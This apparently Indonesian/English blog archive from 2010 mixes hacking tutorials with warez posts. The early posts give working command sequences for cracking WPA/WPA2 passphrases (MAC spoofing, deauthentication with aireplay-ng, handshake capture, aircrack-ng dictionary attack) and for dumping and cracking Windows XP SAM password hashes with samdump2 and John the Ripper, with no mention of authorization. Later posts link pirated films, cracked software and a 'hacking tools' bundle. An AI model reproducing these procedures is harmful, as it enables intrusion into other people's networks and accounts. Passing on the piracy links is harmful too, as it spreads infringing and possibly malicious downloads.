Wait and see the passphrase
done.

Good Luck…

How to Cracking WPA-PSK and WPA-2 with BackTrack 4 Beta

2010-02-07T18:40:00.000-08:00

The mechanics of cracking WPA is simple and straightforward, the biggest drawback is that you must have the password in your dictionary file after you capture the handshake and there must be a computer connected to the AP you want to compromise. I am using and HP Pavilion Laptop with a Raylink wireless USB antenna, I booted Bactrack 4 from CD and I am eady to begin.

First I have to stop the wireless card so I can manipulate some settings.

airmon-ng stop wlan0

(wlan0 is my wireless USB atenna), if I am usnsure what devices I have I would run

ifconfig -a

to show me all available NIC's

Now down the wireless card by typing

ifconfig wlan0 down

I am now ready to assign a fake mac address to my USB device

macchanger - - mac 00:11:22:33:44:55

I can use any mac address as long as its valid in length and characters this one is simply easy to use.

Next you must identify the bssid and channel of the AP you want to crack

airodump-ng wlan0

This will show you all AP within the range of your wireless card. The screen will look something like

BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
00:1C:58:AE:C3:01 -60 124 1 0 1 54 WPA2 CCMP PSK Network

BSSID Station PWR Rate Lost Packets Probe
00:1C:58:AE:C3:01 00:1B:66:AD:C6:00 -57 0- 1 48 Network

You will need the bssid and channel to proceed to the next step

airodump-ng -c 1 -w wpa1 - - bssid 00:1C:58:AE:C3:01 wlan0

This command starts monitoring traffic on the specific AP and writes the information collected to a file, in this example the file is called wpa1. This file is used in aircrack to decrypt the actual password

Now open a new shell and we are ready to caputre the handshake between a workstation and the AP.

aireplay-ng -0 10 -bssid 00:1C:58:AE:C3:01 -c 00:1C:58:AE:C3:01 wlan0

This command sends a reinjection of deauth packet to the AP and will force a new handshake between the workstation and the AP. When you capture it your airodump screen with show a message across the top saying it has the Handshake.

Now you are ready to crack the password, you can now stop both the airodump and aireplay shells and open a final new shell. By default BackTrack 4 has a dictionary file you can use though I suggest modifing it with additional passwords for a more feature rich attack. It is located under /pentest/wireless/cowpatty and is named dict. You can navigate to it using Konqueror or via command line Now in your new console type in

aircrack-ng wpa1 -w /pentest/wireless/cowpatty/dict

Now if you have the pasword in your dict file it will only take a few moments for the crack and the password to be show on screen.

Many AP now change passwords every hour others have WPA keys with very high encryption values and make it extremely difficult to crack. Bottom line if your a company and you have WPA using very high encryption values this make it almost impossible to crack unless a professional has hours and hours of time and a dict file hundreds of megabytes in size.

BackTrack 4 Pre Final – Public Release and Download

2010-02-07T18:29:00.000-08:00

The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce“. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible.
Check out our BackTrack Videos and Resources, our BackTrack PDF, and our “Introduction to BackTrack 4” movie.

We’ve opened up new subforums for this release. Please report bugs and suggestions
As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf.
If you would like to link to our iso, please use :
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated.
Enjoy
Remote Exploit Team
via Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download.

2010-02-07T18:28:00.000-08:00

BackTrack 4 final version is now released for security professionals. The development team has mentioned that lots of downloads have already taken place from the official site. BackTrack 4 is providing penetration testing, cyber security and most importantly cyber forensics functionalities for the concerned people. It is a fantastic tool as suggested by Perry4Law and PTLB.

BackTrack is one of the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

If you need any help feel free to contact its “Forum” or check its “how to” segment or its “FAQ” segment. If you need good training in these crucial areas, feel free to consult its “Training” segment. If you need any “Techno-Legal” assistance in India you must contact Perry4Law for the same. Perry4Law is India’s first and exclusive techno-legal law firm of India and one of the few in the world.

Perry4Law is also managing Perry4Law Techno-Legal Base (PTLBTM/SM). PTLB is India’s first dedicated techno-legal platform that is providing consultancy, litigation and training services in the fields of cyber law,cyber security , cyber forensics, etc. Presently, India lacks cyber forensics capabilities and PTLB is meeting this much needed requirement. PTLB is operating as a “Resource Centre for Cyber Forensics in India”.

If any person is interested in getting consultancy, litigation or training services in the field of cyber forensics in India, you may check the “Contact Point” of Perry4Law.

Tutorial Install Backtrack 4 final dual boot Windows Vista

2010-01-20T12:51:00.000-08:00

Backtrack 4 Final bisa di install pada windows Vista, caranya? lihat aja penjelasannya disini :

susah,sulit,mumet....pusing deh mikirin BT4 final...

Tutorial Install Backtrack 4 pree final gratis

2010-01-20T12:11:00.000-08:00

Penasaran dengan BT 4 Pree Final dan ingin menginstall pada Hardisk?

Lihat disini dengan jelas ( buat dulu dua partisi, partisi ext dan partisi swap ).
Tapi pada dvd Bt4 final sudah tersedia cara partisinya juga.

Semoga bermanfaat...

Tools Backtrack 4 Pre Final Release

2010-01-20T06:41:00.000-08:00

The team at offensive-security have been working their butts off on BT4 and the latest version is a testament to that.
I’m making room for it on my Aspire One right now. In the mean time, I loaded it up on Vbox and dug around a little to show you some of the new features. Enjoy!

Backtrack 4 APT repo

http://archive.offensive-security.com/

Backtrack 4 Pre Final Screens

Backtrack 4 Pre Final Firefox Info

User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.11
Enabled Extensions: [2]

NoScript 1.9.3.3
Ubuntu Firefox Modifications 0.6

Disabled Extensions: [5]

Firebug 1.3.3
FoxyProxy 2.9
Greasemonkey 0.8.20090123.1
HackBar 1.3.2
Tamper Data 10.1.0

Backtrack 4 Pre Final Tutorial/Guide PDF

http://www.offensive-security.com/backtrack4-guide-tutorial.pdf

Introduction to BackTrack 4 movie

http://www.offensive-security.com/videos/backtrack-security-training-video/up-and-running-backtrack.html

Backtrack 4 Pre Final Subforum

http://forums.remote-exploit.org/backtrack-4-pre-final/

Download Backtrack 4 Pre Final Release ISO (1329MB)

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso

Hacking WEP Password

2010-01-20T01:25:00.000-08:00

Sebelum kita memulainya kita harus berdo'a :

Peralatan yang kita butuhkan yaitu :
1. Backtrack 3,2, atau 4Pre Final (boleh menggunakan Distro Linux Yang lainnya)
2. Komputer PC minimal pentium III 1Ghz
3. Memory 512 (Recomended)
4. VGA (Terserah) yang penting di atas 64Mb.
5. Nah yang satu ini lebih penting yaitu " Wireless Card USB/PCI" dan yang lebih penting lagi Chipset nya "Atheros dan Prism". Kenapa Atheros dan Prism?? Karena Chipset tersebut Support untuk teknik inject jaringan.

Sekarang kita mulai untuk berperang. Karena jika saya menerangkan dengan tulisan pasti akan panjang sekali. Maka dari itu saya langsung memberikan Video nya saja. Mohon di maklumi. He he he he
Ini adalah Video Hacking WEP dengan Backtrack 3 Final :
http://www.youtube.com/watch?v=WqQDqvqCYqU&feature=player_embedded

Cracking Password Windows XP Menggunakan Linux Backtrack 3 beta

2010-01-20T01:15:00.000-08:00

Langkah pertama yg harus anda lakukan adalah memiliki Distro Linux Backtrack (BT), dalam tutorial ini saya menggunakan BackTrack 3 beta yang dijalankan lewat USB Flashdisk, tapi anda juga dapat menggunakan BT2, hanya saja letak tool yg digunakan ada sedikit perbedaan.
Setting 1st Booting lewat USB Flashdisk/CDRom (jika menggunakan Live CD).
Jika meminta User Login masukkan user="root" pass="toor" kemudian ketik "startx".
Buka konsole (alt+f2) ketik "konsole", atau bisa langsung klik icon konsole.
Pada dasarnya File penyimpanan password terletak pada C:\WINDOWS\system32\config\SAM. File inilah yg akan kita gunakan untuk mendapatkan password Win XP.
Setelah konsole terbuka, ketik: "bkhive /mnt/sda1/WINDOWS/system32/config/system sam". Pastikan semua hardisk sudah ter-mount khusunya hardisk system Win XP. Biasanya untuk hardisk SATA, Drive C:\ Windows terletak pd /mnt/sda1 dan hardisk ATA/IDE terletak pada hda1, anda tinggal mengganti "/mnt/sda1" dengan "/mnt/hda1" atau yg lain sesuai dengan keadaan.
Ketik "samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam"
Ketik "samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam > hash.txt"
Untuk melihat file hasil hash, ketik "cat hash.txt"
Masuk ke direktori johntheripper, dengan mengetik "cd /usr/local/john-1.7.2"
Lakukan cracking password bruteforce dengan perintah "john /root/hash.txt"
Untuk mendapatkan password user tertentu menggunakan perintah "john /root/hash.txt --users=namauser" contoh: "john /root/hash.txt --users=Administrator"
Tekan Enter untuk melihat aktivitas john.
Jika semuanya berjalan lancar maka password akan segera anda dapatkan.

Jika ada kesalahan mohon dikoreksi, maklum newbie.. Selamat Mencoba...!!!

Sekilas Tentang WEP dan WPA

2010-01-20T00:40:00.000-08:00

Keamanan Wireless dengan metode Wired Equivalent Privacy (WEP)

WEP merupakan standart keamanan & enkripsi pertama yang digunakan pada wireless, WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared Key Authentication adalah metoda otentikasi yang membutuhkan penggunaan WEP. Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client, dengan yang dimasukkan client untuk authentikasi menuju access point, dan WEP mempunyai standar 802.11b.

Proses Shared Key Authentication:

Client meminta asosiasi ke access point, langkah ini sama seperti Open System Authentication.
Access point mengirimkan text challenge ke client secara transparan.
Client akan memberikan respon dengan mengenkripsi text challenge dengan menggunakan kunci WEP dan mengirimkan kembali ke access point.
Access point memberi respon atas tanggapan client, akses point akan melakukan decrypt terhadap respon enkripsi dari client untuk melakukan verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key yang sesuai. Pada proses ini, access point akan menentukan apakah client sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang diberikan oleh client sudah benar, maka access point akan merespon positif dan langsung meng-authentikasi client. Namun bila kunci WEP yang dimasukkan client adalah salah, maka access point akan merespon negatif dan client tidak akan diberi authentikasi. Dengan demikian, client tidak akan terauthentikasi dan tidak terasosiasi.

WEP memiliki berbagai kelemahan antara lain :

Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
WEP menggunakan kunci yang bersifat statis
Masalah initialization vector (IV) WEP
Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.
Serangan-serangan pada kelemahan WEP antara lain :

Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya. Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan
Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang lemah dalam melakukan cracking WEP.
Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.

Keamanan wireless dengan metode WI-FI Protected Accsess (WPA)

Merupakan rahasia umum jika WEP (Wired Equivalent Privacy) tidak lagi mampu diandalkan untuk menyediakan koneksi nirkabel (wireless) yang aman dari ulah orang usil atau ingin mengambil keuntungan atas apa yang kita miliki—dikenal dengan jargon hackers. Tidak lama setelah proses pengembangan WEP, kerapuhan dalam aspek kriptografi muncul.
Berbagai macam penelitian mengenai WEP telah dilakukan dan diperoleh kesimpulan bahwa walaupun sebuah jaringan wireless terlindungi oleh WEP, pihak ketiga (hackers) masih dapat membobol masuk. Seorang hacker yang memiliki perlengkapan wireless seadanya dan peralatan software yang digunakan untuk mengumpulkan dan menganalisis cukup data, dapat mengetahui kunci enkripsi yang digunakan.
Menyikapi kelemahan yang dimiliki oleh WEP, telah dikembangkan sebuah teknik pengamanan baru yang disebut sebagai WPA (WiFI Protected Access). Teknik WPA adalah model kompatibel dengan spesifikasi standar draf IEEE 802.11i. Teknik ini mempunyai beberapa tujuan dalam desainnya, yaitu kokoh, interoperasi, mampu digunakan untuk menggantikan WEP, dapat diimplementasikan pada pengguna rumahan atau corporate, dan tersedia untuk publik secepat mungkin. Adanya WPA yang "menggantikan" WPE, apakah benar perasaan "tenang" tersebut didapatkan? Ada banyak tanggapan pro dan kontra mengenai hal tersebut. Ada yang mengatakan, WPA mempunyai mekanisme enkripsi yang lebih kuat. Namun, ada yang pesimistis karena alur komunikasi yang digunakan tidak aman, di mana teknik man- in-the-middle bisa digunakan untuk mengakali proses pengiriman data. Agar tujuan WPA tercapai, setidaknya dua pengembangan sekuriti utama dilakukan. Teknik WPA dibentuk untuk menyediakan pengembangan enkripsi data yang menjadi titik lemah WEP, serta menyediakan user authentication yang tampaknya hilang pada pengembangan konsep WEP.
Teknik WPA didesain menggantikan metode keamanan WEP, yang menggunakan kunci keamanan statik, dengan menggunakan TKIP (Temporal Key Integrity Protocol) yang mampu secara dinamis berubah setelah 10.000 paket data ditransmisikan. Protokol TKIP akan mengambil kunci utama sebagai starting point yang kemudian secara reguler berubah sehingga tidak ada kunci enkripsi yang digunakan dua kali. Background process secara otomatis dilakukan tanpa diketahui oleh pengguna. Dengan melakukan regenerasi kunci enkripsi kurang lebih setiap lima menit, jaringan WiFi yang menggunakan WPA telah memperlambat kerja hackers yang mencoba melakukan cracking kunci terdahulu.
Walaupun menggunakan standar enkripsi 64 dan 128 bit, seperti yang dimiliki teknologi WEP, TKIP membuat WPA menjadi lebih efektif sebagai sebuah mekanisme enkripsi. Namun, masalah penurunan throughput seperti yang dikeluhkan oleh para pengguna jaringan wireless seperti tidak menemui jawaban dari dokumen standar yang dicari. Sebab, masalah yang berhubungan dengan throughput sangatlah bergantung pada hardware yang dimiliki, secara lebih spesifik adalah chipset yang digunakan. Anggapan saat ini, jika penurunan throughput terjadi pada implementasi WEP, maka tingkat penurunan tersebut akan jauh lebih besar jika WPA dan TKIP diimplementasikan walaupun beberapa produk mengklaim bahwa penurunan throughput telah diatasi, tentunya dengan penggunaan chipset yang lebih besar kemampuan dan kapasitasnya.
Proses otentifikasi WPA menggunakan 802.1x dan EAP (Extensible Authentication Protocol). Secara bersamaan, implementasi tersebut akan menyediakan kerangka kerja yang kokoh pada proses otentifikasi pengguna. Kerangka-kerja tersebut akan melakukan utilisasi sebuah server otentifikasi terpusat, seperti RADIUS, untuk melakukan otentifikasi pengguna sebelum bergabung ke jaringan wireless. Juga diberlakukan mutual authentification, sehingga pengguna jaringan wireless tidak secara sengaja bergabung ke jaringan lain yang mungkin akan mencuri identitas jaringannya.
Mekanisme enkripsi AES (Advanced Encryption Standard) tampaknya akan diadopsi WPA dengan mekanisme otentifikasi pengguna. Namun, AES sepertinya belum perlu karena TKIP diprediksikan mampu menyediakan sebuah kerangka enkripsi yang sangat tangguh walaupun belum diketahui untuk berapa lama ketangguhannya dapat bertahan.

Free Download Movie G.I. JOE

2010-01-19T23:22:00.000-08:00

Free Download Movie G.I. JOE

Date Released : 7 August 2009
Quality : DVDRip
Info : imdb.com/title/tt1046173
Lihat : Trailer
Starring : Christopher Eccleston, Sienna Miller
Genre : Action | Adventure | Sci-Fi |

----------------------------------------

Download Files DISINI ATAU DISINI (450 MB-mkv)
----------------------------------------
Download Subtitle Indonesia (OK)
Download Subtitle English

--------------------
Link Download Alternatif :
Link Alternatif [hotfile-802 MB avi]
--------------------

--------------------------------------------------------------------------------------------------------------
Versi AVI:
Download File : CD1 & CD2 (@700 MB x 2= 1,4 GB)
----------------------------------------
Download Subtitle Indonesia
Download Subtitle English

Free Download Movie 2012 the movie

2010-01-19T23:19:00.000-08:00

Free Download Movie 2012 the movie

2012 2009 HQ TeleSync LiNE XViD READNFO-FUSION
INFO : http://www.imdb.com/title/tt1190080/
Genre: Action | Drama | Thriller
Directed by: Roland Emmerich
Starring: John Cusack, Chjwetel Ejiofor, Amanda Peet, Oliver Platt

Never before has a date in history been so significant to so many cultures, so many religions, scientists, and governments. A global cataclysm brings an end to the world and tells of the heroic struggle of the survivors. Centuries ago, the Maya left us their calendar, with a clear end date and all that it implies. By 2012, we’ll know — we were warned.

[ Check Download Links ]

http://hotfile.com/dl/17883265/50fa5ff/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part1.rar.html
http://hotfile.com/dl/17883606/cd0e395/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part2.rar.html
http://hotfile.com/dl/17883943/cf8fed0/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part3.rar.html
http://hotfile.com/dl/17884196/162e637/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part4.rar.html
http://hotfile.com/dl/17884524/c5aca66/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part5.rar.html
http://hotfile.com/dl/17884874/3d37e8a/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part6.rar.html
http://hotfile.com/dl/17885212/9c58840/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part7.rar.html
http://hotfile.com/dl/17885221/66928d0/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part8.rar.html

Free Download Movie Hannah Montana

2010-01-19T23:16:00.000-08:00

HANNAH MONTANA THE MOVIE

Date Released : 10 April 2009
Quality : DVDScr
Info : imdb.com/title/tt1114677
Lihat : Trailer
Starring : Miley Cyrus, Billy Ray Cyrus
Genre : Comedy | Drama | Family | Music | Romance

Download File
Download Subtitle English
--------------------------------------------------------------------------------------------------------------------------------------------------------------

R E V I E W

Bagaimana jadinya jika popularitas membuat segalannya berubah. Itu yang sedang terjadi pada diri Miley Stewart (Miley Cyrus) . Sejak sukses lewat perannya sebagai Hannah Montana, Miley mulai berubah menjadi orang lain. Ketenaran sebagai seorang penyanyi muda berbakat, membuat nya tidak sebebas dahulu. Miley selalu tampil dengan memakai wig pirang, yang menutupi rambutnya yang berwarna hitam, sehingga para penggemarnya tidak tahu saat keluar masuk mall bersama sahabatnya. Berbagai jadwal yang padat membuatnya semakin jauh dari keluargamya.

Setelah pertengkaran hebatnya dengan Tyra Banks karena berebut sepasang sepatu bermotif zebra di sebuah toko, Ayah Miley, Robby (Billy Ray Cyrus) mengajak Miley untuk pulang sebentar ke rumah neneknya di Tennessee tempat tinggal mereka sebelumnya. Robby berharap Miley dapat meluangkan sedikit waktu untuk merenungi perubahan drastis yang telah terjadi padanya.

Di rumah neneknya, Miley akhirnya dapat menikmati hari-harinya. Berbagai peristiwa lucu pun dialaminya. Hubungannya dengan Travis, teman masa kecilnya pun terjalin makin akrab. Travis sendiri, sampai sejauh itu, belum mengetahui Miley adalah seorang Hannah. Miley juga menyempatkan diri untuk menemui dua sahabat lamanya Lilly (Emily Osment) dan Oliver (Mitchel Musso).

Bagaimana kelanjutannya, akan kah Miley kembali ke Miley yang dulu, atau kembali menjadi seorang Hannah Montana lagi untuk melanjutkan popularitasnya???

Download Free Diskeeper 2010 Pro Premier

2010-01-19T23:10:00.000-08:00

Download Free Diskeeper 2010 Pro Premier

Diskeeper 2010 Pro Premier
Diskeeper 2010 Pro Premier 14.0.900 x32 x64
Diskeeper Pro Premier Every system, every network, every company suffers from the effects of fragmentation. When fragmentation occurs, the system has already wasted precious I/O resources by writing fragmented files to many spaces on the disk instead of contiguously to one spot. With Diskeeper 2010 performance software, now you can prevent up to 85% of the fragmentation written to disk. Your system runs at maximum performance levels on a clean, fast and efficient disk.

20 MB | Rapidshare - Megaupload - Hotfile

Download Diskeeper 2010 Pro Premier x32

Rapidshare - Megaupload - Hotfile

Download Diskeeper 2010 Pro Premier x64

Rapidshare - Megaupload - Hotfile

Download free Google Earth Plus 5.0.11733.9347

2010-01-19T23:05:00.000-08:00

Google Earth Plus 5.0.11733.9347

With Google Earth Plus, you have access to
Google's comprehensive globe with high resolution imagery,
street data, panoramic StreetView images, historical imagery,
and points of interest. Google Earth Plus offers additional tools
specifically for business users

including:

1-High resolution printing
2-GIS data import to quickly map GIS data
3-Spreadsheet import tool to map thousands of addresses
at once
4-Movie Maker to create custom videos of Google Earth Plus
for your clients and customers

Code:

http://hotfile.com/dl/17938407/afb5998/Google_Earth_Plus_5.0.rar.html

Download free Movie Edit Pro 15 PLUS

2010-01-19T23:01:00.000-08:00

MAGIX Movie Edit Pro 15 Plus is a complete solution for cutting and editing video. In just 3 simple steps, use your own recordings to create movie projects with professional captions,

impressive special effects, and the right background music then burn them onto DVD or Blu-ray Disc. It allows you to import your recordings. You can edit your videos qucikly and easily: The integrated cutting automation transforms your recordings into professional movies automatically, including captions, transitions, effects, and music. Version 15 adds MutliCam editing (for 2 cameras), animated menus for Blu-ray Discs, 3D presets for realistic 3D title effects, native AVCHD editing, simplified effects control, flexible user interface.

download rapidshare
download megaupload

Download Free Fox Video Studio v8.1.8.1025

2010-01-19T22:57:00.000-08:00

Download Free Fox Video Studio v8.1.8.1025

Fox Video Capture / Convert / Burn Studio adalah mengkonversi video dan DVD authoring
perangkat lunak yang memungkinkan orang berbuat lebih banyak dengan video. Pilih versi yang tepat untuk Anda. Fox Video Capture / Convert / Burn Studio berbuat lebih banyak dengan media digital. Video Capture, Convert, Burn perpecahan dan semua didukung oleh perangkat canggih ini. Mudah membuat standar atau high-definition video, audio atau DVD, dengan kualitas studio personalisasi menu. Tidak peduli menangkap senang Anda waktu dari DV Anda atau perangkat video lainnya; atau membakar video ke DVD; bahkan mengkonversi video ke format yang Anda butuhkan di sebuah website; dalam 4-langkah, Fox Video Capture / Convert / Burn Studio akan mengungkapkan ide-ide kreatif Anda dan membaginya dengan teman-teman Anda.

Fox Video Capture / Convert / Burn Studio Fitur Utama
Capture, mengubah, dan Burn untuk menciptakan selera yang baik!

Fitur:
- Convert AVI, MPEG, MPEG 1, MPEG 2, MPEG 4, VCD, DVD, SVCD, RMVB, RM, WMV, MOV, DIVX dan format video lainnya;
- Burn DVD dan menciptakan menu;
- Mengkonversi film Anda dalam batch-mode;
- Split AVI, VCD, DVD atau video lainnya menjadi beberapa yang
- Customizable video ukuran layar, audio / video bit rate, frame rate, aspek
????: RelaxihA Forum http://relaxiha.com/forums/showthread.php?t\u003d27270
- Dan banyak lagi!

Wide-Covered TANGKAP:
- Video Capture;
- Capture video dari perangkat: DV, WEB Camera, VCR, TV Tuner, dan Analog Kamera.
- Audio & Image Capture.
- TANGKAP Audio dan Gambar dari video: AVI, MPEG, VCD, DVD, SVCD, WMV dan format video lainnya.

Mengubah kecepatan tinggi:
Dengan kombinasi DirectX 9.0 dan kecepatan tinggi mengubah encoders tersedia, Anda benar-benar tidak akan menemukan aplikasi yang mengubah lebih cepat daripada Fox Video Capture / Convert / Burn Studio.

Burn DVD dan menciptakan menu:
- Membuat film DVD dari file video dari semua format yang didukung dengan kualitas output yang indah, penuh fungsi yang mudah digunakan dan banyak pilihan. Dengan itu, Anda dapat melihat mereka di DVD player rumah Anda dengan teman dan keluarga.
Enam template yang disediakan untuk Anda dalam menu ini. Kita dirancang lebih humanisasi dan Rasionalisasi dalam menu pembakaran untuk membuat hasil pembakaran lebih menarik dan menarik.

Menyesuaikan proses konversi:
- Pilih antara kualitas dan ukuran file (High, Medium, Low). The "Tinggi" pengaturan akan menghasilkan video berkualitas sangat tinggi tapi ukuran file yang lebih besar, sedangkan "Low" pengaturan akan menghasilkan ukuran file sangat kecil, tapi kualitas video yang lebih rendah. Juga, Anda dapat mengatur video Anda ke ukuran yang otomatis akan memilih PSP terbaik resolusi yang paling mewakili file (s) yang dikonversi.
????: RelaxihA Forum http://relaxiha.com/forums/showthread.php?t\u003d27270

Split:
- Ukuran volume untuk menghasilkan.
Karena file DVD seringkali sangat besar, Anda bisa membagi film besar menjadi beberapa bagian yang lebih kecil Fox Video Capture / Convert / Burn Studio memberikan solusi dalam pemecahan.
Tersedia format

Input Format:
- AVI (DivX, XviD, MS MPEG 4, Tak terkompresi, Cinepak dan lain-lain)
- MPEG (MPEG 1, MPEG 2 Video, VCD, DVD, SVCD)
- WMV Windows Media Video
- Quick Time format video Apple untuk Macintosh
- RM Real Media
- MOV Sebuah film QuickTime sebenarnya dapat digunakan untuk menyimpan film dan suara baik
- ASF Advanced Streaming Format (sebelumnya Active Streaming Format)
- AC3 Audio Codec 3
- AMR Adaptive Multi Rate
- AAC
- VOB
- WAV

Output Format:
- AVI (DivX, XviD, MS MPEG 4, Tak terkompresi, Cinepak dan lain-lain)
- MPEG (MPEG 1, MPEG 2 Video, VCD, DVD, SVCD)
- WMV Windows Media Video
- RM Real Networks Video

download

Download free Movavi Video Suite 8.0

2010-01-19T22:51:00.000-08:00

Download Movavi Video Suite 8.0
From Rapidshare or Megaupload

Movavi Video Suite 8.0
Movavi Video Suite 8.0

Movavi Video Suite gives you EIGHT amazing video tools in one package. Convert video - including HD! - & audio to any formats and devices. Playback media. Rip unprotected DVDs. Transfer media files to & from mobile devices. Create photo slideshows. Download online video. Split & merge video. Edit video on a timeline, improve video quality, apply artistic effects. Insert transitions, add soundtracks & text titles. Burn CD/DVD.

195 MB | Rapidshare - Megaupload - Mediafire

Download Movavi Video Suite 8

Rapidshare - Megaupload - Mediafire

Download Free JetAudio Plus 8.0

2010-01-19T22:47:00.000-08:00

Download JetAudio Plus 8.0

JetAudio Plus 8.0
Cowon jetAudio Plus 8.0

JetAudio is integrated multimedia software composed of a single compact rack. Not only does it play various music and video files, but it also has other features such as CD burning, recording, conversion to other file formats, and so on. In addition to these features, you have the ability to create your own Internet broadcasting by using JetCast, which is provided with JetAudio. Play all major file formats and discs, including WAV, MP3, MP3Pro, OGG, WMA, MPG, AVI, WMV, MIDI, RM, and video, and audio CD.

25 | Rapidshare - Megaupload

Download JetAudio

Rapidshare - Megaupload

Download Free Internet Manager v5.18

2010-01-19T22:42:00.000-08:00

Download Free Internet Manager v5.18

Internet Download Manager (IDM) is a tool to increase download speeds by up to 500 percent, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.

Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process. Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance.

Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, directories with authorization, MP3 audio and MPEG video content processing, and a large number of directory listing formats. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include:

* Multilingual support
* Zip preview
* Download categories
* Built-in download accelerator
* Scheduler pro
* Sounds on events
* HTTPS support
* Queue processor
* Pipelining of ftp commands
* Html help and tutorial
* Enhanced virus protection on download completion
* Progressive downloading with quotas
* Command line parameters

What's new in version 5.18 build 5 ?

* Fixed critical bugs.

Multilingual: (English, Spanish, French, Italian, Deustch, Japanese, Portugues, etc)
Compatible with: All Windows[quote]

IDM 5.18.5 New Crack ( 100% Working and clean )

Download

Rapidshare

Code:

http://rapidshare.com/files/307782725/Internet_Download_Manager_v5.18.tehlolkid.rar

Hotfile:

Code:

http://hotfile.com/dl/17767726/ae3977b/Internet_Download_Manager_v5.18.tehlolkid.rar.html

Download free Accelerator Plus 9.3

2010-01-19T22:38:00.000-08:00

Download Accelerator Plus 9.3

Info:-

Code: [Select All | Check Download Links]

Install the program
Put the files into the installed directory.

Automatic Mirroring Speed Boost
Search for the fastest download sources
Switch to faster mirror sites while downloading
 
Download Security
Download safer as you see what the leading security
programs say about your files    

Pause & Resume
Continue broken or paused downloads   

Video Preview
Watch previews of videos as they download 

Trace Cleaner
Remove download traces from your computer  

File Shredder
Completely shred and destroy files   

ZIP Preview
Preview and extract Zip files as they download

Private Downloads
Lock, hide, and protect your downloads   

Twitter Integration
Tweet directly from DAP and let your followers know what you are doing  

Video Expansions Buy Premium Download Free  
SpeedBit Video Downloader

Download YouTube / web videos to your computer   

SpeedBit Video Accelerator
Expansion to watch YouTube & HD videos without pauses and buffering

Download:-

Code: [Select All | Check Download Links]

http://rapidshare.com/files/335972210/Badboys-aftermath.Download_Accelerator_Premium.zip

Code: [Select All | Check Download Links]

http://hotfile.com/dl/24377463/c67368d/Badboys-aftermath.Download_Accelerator_Premium.zip

Selamat mendownload gratis.

Download rar The Best collection of Hacking tools available Includes MSN and Yahoo hack tools.

2010-01-19T22:34:00.000-08:00

